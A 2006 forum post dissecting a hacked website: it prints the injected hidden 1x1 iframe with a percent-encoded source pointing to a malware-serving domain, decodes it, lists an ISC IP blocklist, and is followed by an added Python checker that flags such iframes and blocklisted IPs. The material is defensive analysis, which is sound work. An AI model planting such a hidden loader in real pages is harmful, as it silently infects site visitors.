January 5th, 2006, 01:23 PM
#11
I've now seen this in action on an infected web page.
Now, I'll post real domains here because I trust you boys and girls to be CAREFUL with this stuff. Use Samspade for Windows or some other safe browser.
Here's an infected site: www[dot]thirdgenerationbluegrassband[dot]com - the site itself has been hacked, so the exploit is nothing to do with the site owners.
At the beginning of the HTML is an IFRAME:
<iframe src= http:// do not click %77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
That deobfuscates to http://www[dot]trust4free[dot]ws/?id=index12 (don't visit this site in a standard web browser!!). This looks like an innocent site in Japanese, hosted on 85.255.114.164 (Inhoster). At the bottom of the page is what appears to be some standard Stats4all tracking code (attached as a GIF because it's waaaay too dangerous to post here)... but the tracking code refers to stats4all.cc which is not the correct URL, and is actually 85.255.114.163 (Inhoster again). Somewhere hidden in the Javascript is a call to load the infected file. (A quick Google search indicates that stats4all.ws is also suspect).
I almost missed the fake stats4all code, and I'm not going to muck around with it on a Windows PC. The IPs square nicely with the ISC recommended blocklist at http://isc.sans.org/diary.php?storyid=997
InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)
This is the same exploit that hit the knoppix-std.org site. A bit of Googling for stats4all.cc and trust4free.ws indicates that this has been going on since at least 18th December 2005, so more than a week before it became public knowledge.
To protect yourself against this particular threat from this particular source, I'd recommend applying the ISC blocklist. Also consider blocking access to .biz, .cc and .ws domains temporarily.
There are many other vectors for this thing to come in on though, so even if you block this particular common attack you're still potentially vulnerable to others.
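As an added example (not part of the original post), here is a small Python checker for the two things the post walks through by hand: percent-decoding a hidden 1x1 iframe src, and testing whether a host's IP falls inside the quoted ISC blocklist ranges. The sample HTML is constructed for the demo and only reuses the encoded src string shown above.

```python
import ipaddress
import re
from urllib.parse import unquote

# The two ISC blocklist ranges quoted in the post.
BLOCKLIST = [ipaddress.ip_network(n) for n in ("69.50.160.0/19", "85.255.112.0/20")]

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs; value may be double-quoted, single-quoted or bare (as in the post).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(attr_text):
    """Lower-cased attribute dict from the inside of an <iframe ...> tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def suspicious_iframes(html):
    """Return (decoded_src, reasons) for each iframe that looks like a hidden loader."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        raw_src = attrs.get("src", "")
        src = unquote(raw_src)          # %77%77%77%2E... -> www.
        reasons = []
        if "%" in raw_src and src != raw_src:
            reasons.append("percent-encoded src")
        try:
            tiny = int(attrs.get("width", "100")) <= 2 and int(attrs.get("height", "100")) <= 2
        except ValueError:
            tiny = False
        if tiny:
            reasons.append("1x1 frame")
        if reasons:
            findings.append((src, reasons))
    return findings

def in_blocklist(ip):
    """True if the address lies in one of the ISC ranges above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKLIST)

# Constructed sample page: one benign embed, one hidden counter-style iframe from the post.
SAMPLE = """<html><body>
<iframe src="http://example.com/player" width="600" height="400"></iframe>
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
</body></html>"""
```

Run it over a fetched page (or a saved copy) and pair each flagged src with a DNS lookup into `in_blocklist` to reproduce the post's check without a browser.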